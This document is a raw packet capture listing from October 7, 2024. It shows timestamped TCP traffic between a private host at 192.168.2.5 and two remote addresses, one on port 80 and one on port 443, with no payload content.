Oct 7, 2024 03:15:42.317257881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317272902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317274094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317290068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317308903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317316055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317329884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317332029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317344904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317361116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317362070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317385912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317392111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317399025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317430019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317447901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317483902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317488909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317512989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317528963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317538977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317542076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317559004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317574024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317574978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317591906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317605972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317612886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317641020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317651033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317656040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317670107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317682028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317697048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317707062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317713022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317738056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317753077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317754030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317770004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317776918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317786932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317802906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317820072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317828894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317832947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317871094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317873955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317886114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317899942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317900896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317919970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317934036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317941904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317950010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317975044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.317982912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.317989111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318006039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318012953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318022013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318037987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318054914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318078041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318092108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318093061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318109989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318120956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318160057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318217039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318231106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318238020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318244934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318253040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318259001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318274021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318289042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318345070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318373919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318382025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318389893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318408012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318444967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318473101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318487883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318504095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318517923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318533897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318533897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318550110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.318561077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.318598986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.339427948 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.339509964 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.339567900 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.339813948 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.339832067 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.339843035 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.339849949 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.343542099 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.343584061 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.343717098 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.343894005 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.343909979 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.347207069 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.347645998 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.347656012 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.348279953 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.348284960 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.359369993 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.359466076 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.359527111 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.359814882 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.359814882 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.359831095 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.359843016 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.362940073 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.362952948 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.363135099 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.363209009 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.363219976 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.389841080 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.389995098 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.390202999 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.390202999 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.390202999 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.393346071 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.393435001 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.393769026 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.393769026 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.393899918 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.407150030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407169104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407244921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407325029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407351017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407371998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407398939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407404900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407404900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407404900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407422066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407428980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407445908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407449007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407461882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407478094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407490969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407504082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407526016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407527924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407551050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407558918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407567024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407573938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407582045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407597065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407604933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407624006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407632113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407641888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407656908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407682896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407686949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407699108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407712936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407717943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407733917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407752991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407762051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407777071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407793045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407793999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407809973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407818079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407836914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407852888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407855988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407867908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407885075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407896996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407902956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407919884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407928944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407953024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407958984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.407968998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.407985926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408004045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408013105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408026934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408031940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408049107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408065081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408067942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408083916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408099890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408103943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408126116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408128977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408143997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408155918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408159018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408176899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408193111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408198118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408209085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408225060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408240080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408242941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408258915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408260107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408283949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408307076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408308983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408335924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408341885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408351898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408371925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408382893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408401966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408417940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408428907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408433914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408451080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408459902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408476114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408488035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408492088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408508062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408530951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408534050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408550024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408560038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408565998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408580065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408581018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408598900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408613920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408628941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408629894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408659935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.408665895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408687115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.408723116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.435640097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.440546036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.448906898 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.448956013 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.449008942 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.449013948 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.449084997 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.449403048 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.449418068 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.449434996 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.449440956 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.452999115 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.453017950 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.453114986 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.453279972 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:42.453290939 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.642710924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642731905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642802954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.642836094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642851114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.642853022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642868996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642885923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642890930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.642904997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642918110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.642961979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.642971039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.642987013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643002987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643017054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643021107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643043995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643060923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643064022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643086910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643100023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643104076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643120050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643138885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643146038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643162012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643177032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643178940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643197060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643199921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643213987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643230915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643239975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643259048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643274069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643276930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643300056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643302917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643317938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643333912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643337011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643354893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643368959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643373013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643404007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643418074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643419981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643426895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643435001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643461943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643471003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643479109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643496037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643507957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643512011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643528938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643531084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643546104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643563032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643565893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643589973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643610001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643616915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643635988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643644094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643661976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643668890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643680096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643693924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.643696070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.643723011 CEST	80	49782	95.164.90.97	192.168.2.5
